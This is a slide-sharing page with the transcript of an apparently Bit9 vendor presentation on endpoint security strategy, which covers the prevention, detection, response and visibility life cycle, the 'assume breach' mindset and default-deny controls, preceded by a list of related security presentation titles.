Security Life Cycle for Advanced Threats

Slides:

Advertisements

Similar presentations

1© Copyright 2011 EMC Corporation. All rights reserved. The Future of the Advance Soc 3rd Annual Privacy, Access and Security Congress, Ottawa, 2012 Mike.

Advertisements

© 2013 Bradford Networks. All rights reserved. Rapid Threat Response From 7 Days to 7 Seconds.

©2014 Bit9. All Rights Reserved The Evolution of Endpoint Security: Detecting and Responding to Malware Across the Kill Chain Mary Ann Fitzsimmons Regional.

SIEM Based Intrusion Detection Jim Beechey May 2010 GSEC, GCIA, GCIH, GCFA, GCWN twitter: jim_beechey.

1© Copyright 2011 EMC Corporation. All rights reserved. Anatomy of an Attack.

1© Copyright 2014 EMC Corporation. All rights reserved. Securing the Cloud Gintaras Pelenis Field Technologist RSA, the Security Division of EMC

Next Generation Endpoint Security Jason Brown Enterprise Solution Architect McAfee May 23, 2013.

Introducing WatchGuard Dimension. Oceans of Log Data The 3 Dimensions of Big Data Volume –“Log Everything - Storage is Cheap” –Becomes too much data –

©2014 Bit9. All Rights Reserved The Evolution of Endpoint Security: Detecting and Responding to Malware Across the Kill Chain Chris Berninger, Sr. Solutions.

Top of Content Box Line Subtitle Line Title Line Ruslans Barbasins| Territory Manager – CIS, Central Asia, Caucasus Leading The World Into Connected Security.

11 Zero Trust Networking PALO ALTO NETWORKS Zero Trust Networking April 2015 | ©2014, Palo Alto Networks. Confidential and Proprietary.1 Greg Kreiling.

Radware DoS / DDoS Attack Mitigation System Orly Sorokin January 2013.

©2014 Bit9. All Rights Reserved Building a Continuous Response Architecture.

David Flournoy Bit9 Mid-Atlantic Regional Manager

© 2015 Cisco and/or its affiliates. All rights reserved. 1 The Importance of Threat-Centric Security William Young Security Solutions Architect It’s Our.

© 2012 Solera Networks. Contains confidential, proprietary, and trade secret information of Solera Networks. Any use of this work without express written.

Mel Pless, Sr. Director, Solutions Consulting Guidance Software, Inc. Let’s Get Right To The Endpoint Leveraging Endpoint Data to Expose,

1Cisco Security NOW © 2003, Cisco Systems, Inc. All rights reserved. THIS IS THE POWER OF CISCO SECURITY. now.

John Prisco President and CEO Triumfant, Inc. Our defenses are designed to defeat threats we have seen before. We have very little protection against.

Security Imperatives in a New Workplace Partnering to Protect Digital Information in the 21st Century Presented by Michael Ferris, Alaska Enterprise Solutions.

1© Copyright 2012 EMC Corporation. All rights reserved. Getting Ahead of Advanced Threats Advanced Security Solutions for Trusted IT Chezki Gil – Territory.

Dell Connected Security Solutions Simplify & unify.

©2014 Bit9. All Rights Reserved Endpoint Threat Prevention Charles Roussey | Sr. Sales Engineer Detection and Response in Seconds.

The Changing World of Endpoint Protection

Ali Alhamdan, PhD National Information Center Ministry of Interior

CIO Perspectives on Security Fabrício Brasileiro Regional Sales Manager.

Network security Product Group 2 McAfee Network Security Platform.

PUTTING MANAGED FILE TRANSFER IN PERSPECTIVE May 2015 Derek E. Brink, CISSP, Vice President and Research Fellow IT Security and IT GRC.

1© Copyright 2014 EMC Corporation. All rights reserved. Applying the Power of Data Analytics to Cyber Security Dr. Robert W. Griffin Chief Security Architect.

Connected Security Your best defense against advanced threats Anne Aarness – Intel Security.

BUFFERZONE Advanced Endpoint Security Data Connectors-Charlotte January 2016 Company Confidential.

Visibility. Intelligence. response Information Security: Risk Management or Business Enablement? Mike Childs Vice President Rook Security.

Rapid Detection & Incident Response What, Why and How March 2016 Ft Gordon.

©2015 Check Point Software Technologies Ltd. 1 Website Watering Holes Endpoints are at risk in numerous ways, especially when social engineering is applied.

Enterprise’ Ever-Evolving Challenge & Constraints Dealing with BYOD Challenges Enable Compliance to Regulations Stay Current with New Consumption Models.

Contextual Security Intelligence Suite™ Preventing Data Breaches without Constraining Business.

©2012 Bit9. All Rights Reserved Peter Llorens, PERegional Sales Manager, FL, Caribbean & Latin America Julio GutierrezSales Engineer, FL, Caribbean & Latin.

Why SIEM – Why Security Intelligence??

1© Copyright 2012 EMC Corporation. All rights reserved. Next Generation Authentication Bring Your Own security impact Tim Dumas – Technology Consultant.

Get Full Protection on Microsoft Azure with Symantec™ Endpoint Protection 12.1 MICROSOFT AZURE ISV PROFILE: SYMANTEC Symantec™ Endpoint Protection is an.

Tripwire Threat Intelligence Integrations. 2 Threat Landscape by the Numbers Over 390K malicious programs are found every day AV-Test.org On day 0, only.

Understanding and breaking the cyber kill chain

Proactive Incident Response

Protect your Digital Enterprise

Advanced Endpoint Security Data Connectors-Charlotte January 2016

Sophos Intercept X Matt Cooke – Senior Product Marketing Manager.

Your Partner for Superior Cybersecurity

Understanding DATA LOSS PREVENTION

Sophos Intercept Next-Gen Endpoint Protection

Ilija Jovičić Sophos Consultant.

Today’s cyber security landscape

Juniper Software-Defined Secure Network

Now, let’s implement/trial Windows Defender Advanced Threat Protection

Real-time protection for web sites and web apps against ATTACKS

Introduction to a Security Intelligence Maturity Model

Active Cyber Security, OnDemand

Automate, or Die Building a Continuous Response Architecture

Gelişmiş Tehdit Korumasının İnkar Edilemez 4 Gerçeği

Closing the Breach Detection Gap

THE NEXT GENERATION MSSP

11/17/2018 9:32 PM © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN.

Shifting from “Incident” to “Continuous” Response

Panda Adaptive Defense Platform and Services

How to Mitigate the Consequences What are the Countermeasures?

Managing IT Risk in a digital Transformation AGE

Information Protection

Microsoft Data Insights Summit

Counter APT Counter APT HUNT operations combine best of breed endpoint detection response technology with an experienced cadre of cybersecurity experts.

Information Protection

AIR-T11 What We’ve Learned Building a Cyber Security Operation Center: du Case Study Tamer El Refaey Senior Director, Security Monitoring and Operations.

Presentation transcript:

Security Life Cycle for Advanced Threats Prevent Prevention Visibility Detection Response EPP Detect & Respond Central is visibility. Several tools on the market provide network visibility. Detection: must interpret the visibility data to identify threatening events. Repsonse: How quickly can we understand what happened and scope. Visibility at the endpoint is critical. Prevention: How can advanced threats be stopped? ETDR

You could keep the enemy at the gates Once Upon A Time… You could keep the enemy at the gates

Technology Has Evolved Cloud Computing Mobile Computing Internet of Things Surface area is ever-increasing Perimeters are becoming less relevant Everything is connected to something Technology is crossing into our physical world Let’s start with technology… call it Moore’s Law or what you will, but the technology world is evolving at a tremendous pace. <click> Cloud computing, mobile, the Internet of Things… these are all new realities of the past decade. They have changed the way we interact and interconnect, and consequently this changes how we are vulnerable, the attack surface, and what companies must do to protect themselves. <click> The surface area is constantly expanding. From remote users, to users directly interacting with the cloud (public and private), to personal/business dual use devices. There is no well defined perimeter anymore. You might even argue there is no perimeter at all. Firewalls, IDS/IPS, packet inspection – technologies that rely on perimeter and choke points – are no longer sufficient.

Threat Actors Have Evolved Criminal Enterprises Broad-based and targeted attacks Financially motivated Getting more sophisticated Hactivists Targeted and destructive attacks Unpredictable motivations Generally less sophisticated Nation-States Targeted and multi-stage attacks Motivated by information and IP Highly sophisticated, endless resources

Endless Stream of News

The Malware Problem By the Numbers Bit9 MasterMinds Dallas, TX The Malware Problem By the Numbers 3/26/2013 66% of malware took months or even years to discover (dwell time)1 69% of intrusions are discovered by an external party1 155k The number of new malware samples that are seen daily2 $5.4M The average total cost of a data breach3 1. 2013 Verizon Data Breach Investigations Report | 2. McAfee Threats Report: First Quarter 2013 | 3. Ponemon Institute 2013 Cost of a Data Breach Study

The State of Information Security Compromise happens in seconds Data exfiltration starts minutes later It continues undetected for months Remediation takes weeks At $341k per incident in forensics costs http://www.netdiligence.com/files/CyberClaimsStudy-2013.pdf THIS IS UNSUSTAINABLE

DON’T OVERCOMPLICATE THE THREAT SIMPLE THREAT MODEL: 1: OPPORTUNISTIC 2: NOT DON’T OVERCOMPLICATE THE THREAT

Opportunistic threats find value in our computers Opportunistic threats find value in our computers. Goal: breadth of access. “Advanced” threats find value in our data. Goal: precision of access.

How This Impacts Traditional Security Hosts Compromised Time 10 100 1k 10k 100k Week 2 Week 1 Week 3 Week 4 Week 5 Week 6 Week 7 Signature available. THRESHOLD OF DETECTION Opportunistic Goal is to maximize slope. Hosts Compromised Time 10 100 1k 10k 100k Week 2 Week 1 Week 3 Week 4 Week 5 Week 6 Week 7 THRESHOLD OF DETECTION Signature available? “Advanced” Goal is to minimize slope.

A New Perspective Is Required assume you will be breached compromise is inevitable

“In 2020, enterprises will be in a state of continuous compromise.” Gartner, “Prevention Is Futile in 2020: Protect Information Via Pervasive Monitoring and Collective Intelligence,” Neil MacDonald, May 30, 2013

The Assumption of Breach how will you know? what will you do?

Rethink Your Security Strategy prevention is no longer enough invest in detection and response traditional approaches are ineffective move from reactive to proactive security cannot be done in isolation it is a continuous process

The Adaptive Security Architecture Gartner, “Designing an Adaptive Security Architecture for Protection From Advanced Attacks,” February, 2014

The Adaptive Security Architecture Gartner, “Designing an Adaptive Security Architecture for Protection From Advanced Attacks,” February, 2014

The Adaptive Security Architecture - Capabilities Gartner, “Designing an Adaptive Security Architecture for Protection From Advanced Attacks,” February, 2014

Key Characteristics of “Next Gen” Security Forensic quality data collection and analysis Threat intelligence to interpret and prioritize data At all stages of kill chain, not just point of delivery Based on behaviors and context, not just files/IPs Real-time, not scan or snapshot based Provide full historical context of activity Information needed to assess impact and scope Remediation and containment Proactive signature-less prevention techniques Adapt based on detection and response Incorporate and correlate data from third party sources Export data and alerts to other tools Visibility Detection Response Prevention Integration

Security Life Cycle for Advanced Threats Prevention Visibility Detection Response Central is visibility. Several tools on the market provide network visibility. Detection: must interpret the visibility data to identify threatening events. Repsonse: How quickly can we understand what happened and scope. Visibility at the endpoint is critical. Prevention: How can advanced threats be stopped?

Reduce Attack Surface with Default-Deny Traditional EPP failure Scan/sweep based Signature based Block known bad Success of emerging endpoint prevention solutions Real time Policy based Tailor policies based on environment Trust based Block all but known good Objective of emerging endpoint prevention solutions Lock down endpoint/server Reduce attack surface area Make it as difficult as possible for advanced attacker Prevention Visibility Detection Response Visibility Traditional EPP failure Scan/sweep based Signature based Block known bad Success of emerging endpoint prevention solutions Real time Policy based Tailor policies based on environment Trust based Block all but known good Objective of emerging endpoint prevention solutions Lock down endpoint/server Reduce attack surface area Make it as difficult as possible for advanced attacker

Detect in Real-time and Without Signatures Traditional EPP failure Scan/sweep based Small signature database Success of emerging endpoint detection solutions Large global database of threat intelligence Signature-less detection through threat indicators Watchlists Objective of emerging endpoint detection solutions Prepare for inevitability of breach and continuous state of compromise Cover more of the kill chain than prevention Enable rapid response Prevention Visibility Detection Response Visibility Traditional EPP failure Scan/sweep based Small signature database Success of emerging endpoint detection solutions Large global database of threat intelligence Signature-less detection through threat indicators Watchlists Objective of emerging endpoint detection solutions Prepare for inevitability of breach and continuous state of compromise Cover more of the kill chain than prevention

Rapidly Respond to Attacks in Motion Traditional EPP failure Expensive external consultants Relies heavily on disk and memory artifacts for recorded history Success of emerging endpoint incident response solutions Real-time continuous recorded history delivers IR in seconds In centralized database Attack process visualization and analytics Better, faster and less expensive Objective of emerging endpoint incident response solutions Pre-breach rapid incident response Better prepare prevention moving forward Prevention Visibility Detection Response Visibility Traditional EPP failure Expensive external consultants Relies heavily on disk and memory artifacts for recorded history Success of emerging endpoint incident response solutions Real-time continuous recorded history delivers IR in seconds In centralized database Attack process visualization and analytics Better, faster and less expensive Objective of emerging endpoint incident response solutions Pre-breach rapid incident response Better prepare prevention moving forward

Too Much Data, Not Enough Intelligence integrate your tools attacks happen on endpoints correlate network and endpoint for actionable intelligence incorporate threat intelligence what happens to someone else can happen to you filter, prioritize and alert on third party feeds, reputation and indicators

Summary The threat landscape continues to evolve The enemy is more advanced, attacks are more targeted Rethink your security strategy, traditional security tools are insufficient Assume you will breached Invest in entire lifecycle: detection, response and prevention Don’t treat security tools as islands, integrate them

Endpoint Threat Detection, Response and Prevention for DUMMIES Download the eBook at… Bit9.com eBook resources section https://www.bit9.com/resources/ebooks/endpoint-threat-detection-response-prevention-dummies/

questions